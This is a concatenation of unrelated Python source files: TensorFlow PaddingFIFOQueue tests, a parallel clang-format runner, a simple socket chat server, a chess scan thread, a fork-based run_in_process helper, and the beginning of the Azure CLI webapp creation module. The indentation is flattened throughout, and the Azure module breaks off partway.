1, tf.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q2.dequeue().eval(), [10.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), [1])
self.assertEqual(q2_size_t.eval(), [1])
self.assertEqual(q1.dequeue().eval(), [20.0])
self.assertEqual(q1_size_t.eval(), [0])
self.assertEqual(q2_size_t.eval(), [0])
def testIncompatibleSharedQueueErrors(self):
with self.test_session():
q_a_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_a")
q_a_2 = tf.PaddingFIFOQueue(15, tf.float32, ((),), shared_name="q_a")
q_a_1.queue_ref.eval()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.eval()
q_b_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_b")
q_b_2 = tf.PaddingFIFOQueue(10, tf.int32, ((),), shared_name="q_b")
q_b_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_b_2.queue_ref.eval()
q_c_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_c")
q_c_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_c")
q_c_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_c_2.queue_ref.eval()
q_d_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_2 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_d")
q_d_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.eval()
q_e_1 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = tf.PaddingFIFOQueue(
10, tf.float32, shapes=[(1, 1, 2, 4)], shared_name="q_e")
q_e_1.queue_ref.eval()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.eval()
q_f_1 = tf.PaddingFIFOQueue(10, tf.float32, ((),), shared_name="q_f")
q_f_2 = tf.PaddingFIFOQueue(
10, (tf.float32, tf.int32), ((), ()), shared_name="q_f")
q_f_1.queue_ref.eval()
with self.assertRaisesOpError("component types"):
q_f_2.queue_ref.eval()
def testSelectQueue(self):
with self.test_session():
num_queues = 10
qlist = list()
for _ in xrange(num_queues):
qlist.append(tf.PaddingFIFOQueue(10, tf.float32, ((),)))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = tf.PaddingFIFOQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.test_session():
q1 = tf.PaddingFIFOQueue(10, tf.float32, ((),))
q2 = tf.PaddingFIFOQueue(15, tf.float32, ((),))
enq_q = tf.PaddingFIFOQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("Index must be in the range"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("Dequeue operation was cancelled"):
sess.run(dequeue_many_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("Enqueue operation was cancelled"):
sess.run(enqueue_many_op)
def testResetOfBlockingOperation(self):
with self.test_session() as sess:
q_empty = tf.PaddingFIFOQueue(5, tf.float32, ((),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
q_full = tf.PaddingFIFOQueue(5, tf.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(self._blockingDequeueMany, args=(sess,
dequeue_many_op)),
self.checkedThread(self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(self._blockingEnqueueMany, args=(sess,
enqueue_many_op))]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testBigEnqueueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(5, tf.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
sess.run(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(sess.run(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertAllEqual(elem, results)
def testBigDequeueMany(self):
with self.test_session() as sess:
q = tf.PaddingFIFOQueue(2, tf.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(sess.run(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
sess.run(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertAllEqual(elem, results)
def testDtypes(self):
with self.test_session() as sess:
dtypes = [tf.float32, tf.float64, tf.int32, tf.uint8, tf.int16, tf.int8,
tf.int64, tf.bool, tf.complex64, tf.complex128]
shape = (32, 4, 128)
q = tf.PaddingFIFOQueue(32, dtypes, [shape[1:]] * len(dtypes))
input_tuple = []
for dtype in dtypes:
np_dtype = dtype.as_numpy_dtype
np_array = np.random.randint(-10, 10, shape)
if dtype == tf.bool:
np_array = np_array > 0
elif dtype in (tf.complex64, tf.complex128):
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
input_tuple.append(np_array)
q.enqueue_many(input_tuple).run()
output_tuple_t = q.dequeue_many(32)
output_tuple = sess.run(output_tuple_t)
for (input_elem, output_elem) in zip(input_tuple, output_tuple):
self.assertAllEqual(input_elem, output_elem)
def testUnknownRank(self):
with self.assertRaisesRegexp(ValueError, "must have a defined rank"):
tf.PaddingFIFOQueue(32, [tf.float32], [tf.TensorShape(None)])
class QueueFromListTest(tf.test.TestCase):
def testQueueFromListShapes(self):
which = tf.constant(1)
def _cmp(expected, *shapes):
qs = [
tf.PaddingFIFOQueue(10, [tf.float32], [tf.TensorShape(s)])
for s in shapes]
s_expected = tf.TensorShape(expected)
s = tf.QueueBase.from_list(which, qs).shapes[0]
if s_expected.ndims is None:
self.assertEqual(s_expected.ndims, s.ndims)
else:
self.assertEqual(s_expected.as_list(), s.as_list())
_cmp(None, [1, None], [None])
_cmp([None], [1], [2])
_cmp([1, None], [1, 1], [1, 2])
_cmp([1, None], [1, 1], [1, None])
_cmp([None, None], [None, 1], [1, None])
_cmp([1], [1], [1], [1])
_cmp([None], [1], [None], [1])
_cmp(None, [1, None], [1], [1])
def testQueueFromListShapesMultipleComponents(self):
q_u_u = tf.PaddingFIFOQueue(
10,
[tf.float32, tf.int32],
[tf.TensorShape([None]), tf.TensorShape([None])])
q_u_f = tf.PaddingFIFOQueue(
10, [tf.float32, tf.int32],
[tf.TensorShape([None]), tf.TensorShape([1, 2])])
q_f_f = tf.PaddingFIFOQueue(
10, [tf.float32, tf.int32],
[tf.TensorShape([3, 4]), tf.TensorShape([1, 2])])
which = tf.constant(1)
s_cmp_1 = tf.QueueBase.from_list(which, [q_u_u, q_u_u, q_u_u]).shapes
self.assertEqual([1, 1], [x.ndims for x in s_cmp_1])
self.assertEqual([None, None], [x.as_list()[0] for x in s_cmp_1])
s_cmp_2 = tf.QueueBase.from_list(which, [q_u_u, q_u_u, q_u_f]).shapes
self.assertEqual([1, None], [x.ndims for x in s_cmp_2])
self.assertEqual([None], s_cmp_2[0].as_list())
s_cmp_3 = tf.QueueBase.from_list(which, [q_f_f, q_f_f]).shapes
self.assertEqual([2, 2], [x.ndims for x in s_cmp_3])
self.assertEqual([[3, 4], [1, 2]], [x.as_list() for x in s_cmp_3])
if __name__ == "__main__":
tf.test.main()
|
run-clang-format.py
|
#!/usr/bin/env python
import argparse
import json
import multiprocessing
import os
import re
import subprocess
import sys
import threading
from pathlib import Path
import queue
def get_format_invocation(f, clang_format_binary):
"""Gets a command line for clang-tidy."""
start = [clang_format_binary, "-i", f]
return start
def run_format(args, file_queue, lock):
"""Takes filenames out of queue and runs clang-tidy on them."""
while True:
name = file_queue.get()
invocation = get_format_invocation(name, args.clang_format_binary)
proc = subprocess.Popen(
invocation, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
output, err = proc.communicate()
with lock:
sys.stdout.write(" ".join(invocation) + "\n" + output.decode("utf-8"))
if len(err) > 0:
sys.stdout.flush()
sys.stderr.write(err.decode("utf-8"))
file_queue.task_done()
def main():
parser = argparse.ArgumentParser(
description="Runs clang-format over all files " "in a compilation database."
)
parser.add_argument(
"-clang-format-binary",
metavar="PATH",
default="clang-format",
help="path to clang-format binary",
)
parser.add_argument(
"-i", action="store_true", help="Inplace edit <file>s, if specified"
)
parser.add_argument(
"-j",
type=int,
default=0,
help="number of format instances to be run in parallel.",
)
parser.add_argument(
"files",
nargs="*",
default=[".*"],
help="files to be processed (regex on path)",
)
parser.add_argument(
"-p",
dest="build_path",
help="Path used to read a compile command database.",
)
args = parser.parse_args()
db_path = "compile_commands.json"
build_path = args.build_path
# Load the database and extract all files.
database = json.load(open(os.path.join(build_path, db_path)))
cwd = Path.cwd()
# Build up a big regexy filter from all command line arguments.
file_name_re = re.compile("|".join(args.files))
files = []
for entry in database:
directory = Path(entry["directory"])
file = directory / entry["file"]
relative_path = file.relative_to(cwd)
if file_name_re.search(str(relative_path)):
files.append(str(file))
print(relative_path)
max_task = args.j
if max_task == 0:
max_task = multiprocessing.cpu_count()
try:
# Spin up a bunch of format-launching threads.
task_queue = queue.Queue(max_task)
# Lock used to serialise console output from the worker threads.
lock = threading.Lock()
for _ in range(max_task):
t = threading.Thread(target=run_format, args=(args, task_queue, lock))
t.daemon = True
t.start()
# Fill the queue with files.
for name in files:
task_queue.put(name)
# Wait for all threads to be done.
task_queue.join()
except KeyboardInterrupt:
# This is a sad hack. Unfortunately subprocess goes
# bonkers with ctrl-c and we start forking merrily.
print("\nCtrl-C detected, goodbye.")
os.kill(0, 9)
if __name__ == "__main__":
main()
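# Example invocation (illustrative only, regex and paths are assumptions):
# format every C/C++ source listed in the compile database under ./build,
# running 8 clang-format processes in parallel:
#
#   python run-clang-format.py -p build -j 8 '.*\.(cpp|h)$'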
|
server.py
|
"""
MIT License
Copyright (c) 2021 CarlFandino
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import socket
import threading
import sys,time
class Server:
def __init__(self):
try:
self.ip = socket.gethostbyname(socket.gethostname())
self.port = 8080
self.socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.socket.bind((self.ip,self.port))
self.socket.listen(5)
self.numberOfOnline = 0
self.messages = []
self.users = {}
self.clients = []
threading.Thread(target=self.start).start()
except KeyboardInterrupt:
sys.exit()
def broadcast(self,message):
for client in self.clients:
client.send(str(message).encode())
self.messages.append(message)
def handle(self,addr,conn):
connected = True
self.clients.append(conn)
conn.send(f"\nloadMessage \n{[(i) for i in self.messages]}\n".encode())
while connected:
try:
data = conn.recv(1024).decode()
data = str(data)
if data.split()[0] == "nickname":
self.users[str(addr)] = data.split()[1]
self.userJoined(data.split()[1])
if data.split()[0] == "quit":
self.userQuit(self.users[str(addr)])
self.users.pop(str(addr))
if data.split()[0] == "chat":
self.userChat(self.users[str(addr)],data.replace('chat',''))
except ConnectionResetError:
#print(f"{self.users[str(addr)]} left.")
self.clients.pop(self.clients.index(conn))
connected = False
except ConnectionAbortedError:
self.clients.pop(self.clients.index(conn))
connected = False
except:
pass
def start(self):
print("SERVER RUNNING...")
while True:
self.conn, self.addr = self.socket.accept()
threading.Thread(target=self.handle,args=(self.addr,self.conn,),daemon=True).start()
def userChat(self,name,chat):
self.broadcast(f"chat from {name} : {chat}")
def userJoined(self,name):
self.broadcast(f"join {name} joined.")
self.numberOfOnline += 1
def userQuit(self,name):
self.broadcast(f"left {name} left.")
self.numberOfOnline -= 1
Server()
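# --- client sketch (illustrative only, not part of the original file) ---
# The handle() loop above reads a plain-text protocol: "nickname <name>",
# "chat <message>" and "quit". The hypothetical helper below shows one way a
# client could talk to the server; it is defined here but never called.
def example_client(host="127.0.0.1", port=8080):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect((host, port))
    client.recv(1024)                 # message history sent on connect
    client.send(b"nickname alice")    # register a nickname
    client.send(b"chat hello there")  # broadcast a chat message
    client.send(b"quit")              # leave the room
    client.close()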
|
ScanThread.py
|
from threading import Thread
from typing import Callable, Any
import boardController
from chess import SquareSet
class ScanThread:
def __init__(self, callback: Callable[[SquareSet], Any]):
self._callback = callback
self._thread = Thread(name="ScanThread", target=self._scan_loop)
self._should_quit = False
def start(self):
self._thread.start()
def quit(self):
self._should_quit = True
def _scan_loop(self):
while not self._should_quit:  # honour quit() between board changes
board = boardController.awaitBoardChange()
self._callback(board)
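# --- usage sketch (illustrative only, not part of the original file) ---
# ScanThread simply forwards every board change reported by boardController to
# the supplied callback. The callback below is hypothetical and only prints the
# occupied squares; quit() asks the loop to stop after the next change.
if __name__ == "__main__":
    def print_board(board: SquareSet) -> None:
        print("occupied squares:", list(board))

    scanner = ScanThread(print_board)
    scanner.start()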
|
_multiprocessing.py
|
from __future__ import annotations
import os
import multiprocessing
import sys
from ._imports import multiprocessing_connection
def run_in_process(
target, name=None, args=(), kwargs=None, allow_detach=False, timeout=None
):
"""Run provided target in a multiprocessing.Process.
This function does not require that the `target` and arguments
are picklable. Only the return value of `target` must be.
Args:
target: same as multiprocessing.Process
name: same as multiprocessing.Process
args: same as multiprocessing.Process
kwargs: same as multiprocessing.Process
allow_detach: passes a callback as the first argument to the function
that, when invoked, detaches from the parent by forking.
timeout: seconds after which processing will be aborted and
the child process killed
Returns:
The return value of `target`
Raises:
*: Any exception raised by `target`.
TimeoutError: If a timeout occurs.
"""
if not kwargs:
kwargs = {}
def launcher():
# multiprocessing doesn't offer a good way to detach from the parent
# process, allowing the child to exist without being cleaned up at
# parent close. So given
#
# 1. parent process (which invoked run_in_process)
# 2. runner process (executing target function)
#
# we fork (2), creating (3) then continue executing in (3) and forcibly
# exit (2).
#
# The downside of this approach is that any exceptions from the
# process after detaching will not be propagated to the caller
# (and Windows incompatibility).
def detach(result=None):
# Indicate no exception.
child_pipe.send(False)
child_pipe.send(result)
pid = os.fork()
if pid:
# Ensure we don't return to caller within the subprocess.
os._exit(0)
new_args = list(args)
if allow_detach:
new_args.insert(0, detach)
try:
result = target(*new_args, **kwargs)
except:
child_pipe.send(True)
from tblib import pickling_support
pickling_support.install()
child_pipe.send(sys.exc_info())
# Wait for signal from parent process to avoid exit/read race
# condition.
child_pipe.recv()
# We don't really want the exception traced by multiprocessing
# so exit like Python would.
sys.exit(1)
else:
child_pipe.send(False)
child_pipe.send(result)
child_pipe.recv()
ctx = multiprocessing.get_context("fork")
child_pipe, parent_pipe = ctx.Pipe()
p = ctx.Process(target=launcher, name=name)
p.start()
ready = multiprocessing_connection.wait([p.sentinel, parent_pipe], timeout=timeout)
# Timeout
if not ready:
p.kill()
raise TimeoutError("Timeout running function.")
exc = None
result = None
if parent_pipe in ready:
error = parent_pipe.recv()
if error:
from tblib import pickling_support
pickling_support.install()
_, exception, tb = parent_pipe.recv()
exc = exception.with_traceback(tb)
else:
result = parent_pipe.recv()
if p.sentinel in ready:
# This can happen if the child process closes file descriptors, but we
# do not handle it.
assert p.exitcode is not None, "Exit code must exist"
if p.exitcode:
if not exc:
exc = RuntimeError(f"Process died with return code {p.exitcode}")
else:
# Indicate OK to continue.
parent_pipe.send(True)
p.join()
if exc:
raise exc
return result
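# --- usage sketch (illustrative only, not part of the original module) ---
# run_in_process forks a child, runs `target` there and ships only the return
# value back, so the target and its arguments need not be picklable. The helper
# below is hypothetical and exists purely to demonstrate the call.
def _example_square(x):
    return x * x

if __name__ == "__main__":  # demonstration only
    print(run_in_process(_example_square, args=(7,), timeout=30))  # prints 49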
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import ast
import threading
import time
from urllib.parse import urlparse
from urllib.request import urlopen
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
import invoke
from nacl import encoding, public
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException, prompt_y_n
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent, send_raw_request
from azure.cli.core.profiles import ResourceType, get_sdk
from azure.cli.core.azclierror import (ResourceNotFoundError, RequiredArgumentMissingError, ValidationError,
CLIInternalError, UnclassifiedUserFault, AzureResponseError,
ArgumentUsageError)
from .tunnel import TunnelServer
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation, _generic_settings_operation
from .utils import (_normalize_sku,
get_sku_name,
retryable_method,
raise_missing_token_suggestion,
_get_location_from_resource_group,
_list_app,
_rename_server_farm_props,
_get_location_from_webapp,
_normalize_location,
get_pool_manager)
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
check_resource_group_exists, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime, generate_default_app_name)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS, PUBLIC_CLOUD,
LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH, WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH)
from ._github_oauth import (get_github_access_token)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities.
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
from azure.mgmt.web.models import Site
SiteConfig, SkuDescription, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(name=plan, resource_group_name=resource_group_name)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist in the resource group '{}".format(plan, resource_group_name))
is_linux = plan_info.reserved
node_default_version = NODE_EXACT_VERSION_DEFAULT
location = plan_info.location
# Keep the existing app settings when the command is re-run against an existing webapp name.
name_validation = get_site_availability(cmd, name)
if not name_validation.name_available:
if name_validation.reason == 'Invalid':
raise CLIError(name_validation.message)
logger.warning("Webapp '%s' already exists. The command will use the existing app's settings.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that "
"the app is a part of the current subscription".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in resource group '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
existing_app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name,
name, 'list_application_settings')
settings = []
for k, v in existing_app_settings.properties.items():
settings.append(NameValuePair(name=k, value=v))
site_config = SiteConfig(app_settings=settings)
else:
site_config = SiteConfig(app_settings=[])
if isinstance(plan_info.sku, SkuDescription) and plan_info.sku.name.upper() not in ['F1', 'FREE', 'SHARED', 'D1',
'B1', 'B2', 'B3', 'BASIC']:
site_config.always_on = True
if subnet or vnet:
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=plan_info.location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
webapp_def = Site(location=location, site_config=site_config, server_farm_id=plan_info.id, tags=tags,
https_only=using_webapp_up, virtual_network_subnet_id=subnet_resource_id)
helper = _StackRuntimeHelper(cmd, client, linux=is_linux)
if runtime:
runtime = helper.remove_delimiters(runtime)
current_stack = None
if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
if deployment_container_image_name:
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Windows runtime '{}' is not supported. "
"Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# TODO: Ask Calvin the purpose of this - seems like unneeded set of calls
# portal uses the current_stack property in metadata to display the stack for windows apps
current_stack = get_current_stack_from_runtime(runtime)
else: # windows webapp without runtime specified
if name_validation.name_available: # If creating new webapp
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.begin_create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# TO DO: (Check with Calvin) This seems to be something specific to portal client use only & should be removed
if current_stack:
_update_webapp_current_stack_property_if_needed(cmd, resource_group_name, name, current_stack)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
logger.info("Updating container settings")
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def _validate_vnet_integration_location(cmd, subnet_resource_group, vnet_name, webapp_location):
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
vnet_location = vnet_client.get(resource_group_name=subnet_resource_group,
virtual_network_name=vnet_name).location
vnet_location = _normalize_location(cmd, vnet_location)
asp_location = _normalize_location(cmd, webapp_location)
if vnet_location != asp_location:
raise ArgumentUsageError("Unable to create webapp: vnet and App Service Plan must be in the same location. "
"vnet location: {}. Plan location: {}.".format(vnet_location, asp_location))
def _get_subnet_info(cmd, resource_group_name, vnet, subnet):
from azure.cli.core.commands.client_factory import get_subscription_id
subnet_info = {"vnet_name": None,
"subnet_name": None,
"resource_group_name": None,
"subnet_resource_id": None,
"subnet_subscription_id": None,
"vnet_resource_id": None}
if is_valid_resource_id(subnet):
if vnet:
logger.warning("--subnet argument is a resource ID. Ignoring --vnet argument.")
parsed_sub_rid = parse_resource_id(subnet)
subnet_info["vnet_name"] = parsed_sub_rid["name"]
subnet_info["subnet_name"] = parsed_sub_rid["resource_name"]
subnet_info["resource_group_name"] = parsed_sub_rid["resource_group"]
subnet_info["subnet_resource_id"] = subnet
subnet_info["subnet_subscription_id"] = parsed_sub_rid["subscription"]
vnet_fmt = "/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/virtualNetworks/{}"
subnet_info["vnet_resource_id"] = vnet_fmt.format(parsed_sub_rid["subscription"],
parsed_sub_rid["resource_group"],
parsed_sub_rid["name"])
return subnet_info
subnet_name = subnet
if is_valid_resource_id(vnet):
parsed_vnet = parse_resource_id(vnet)
subnet_rg = parsed_vnet["resource_group"]
vnet_name = parsed_vnet["name"]
subscription_id = parsed_vnet["subscription"]
subnet_info["vnet_resource_id"] = vnet
else:
logger.warning("Assuming subnet resource group is the same as webapp. "
"Use a resource ID for --subnet or --vnet to use a different resource group.")
subnet_rg = resource_group_name
vnet_name = vnet
subscription_id = get_subscription_id(cmd.cli_ctx)
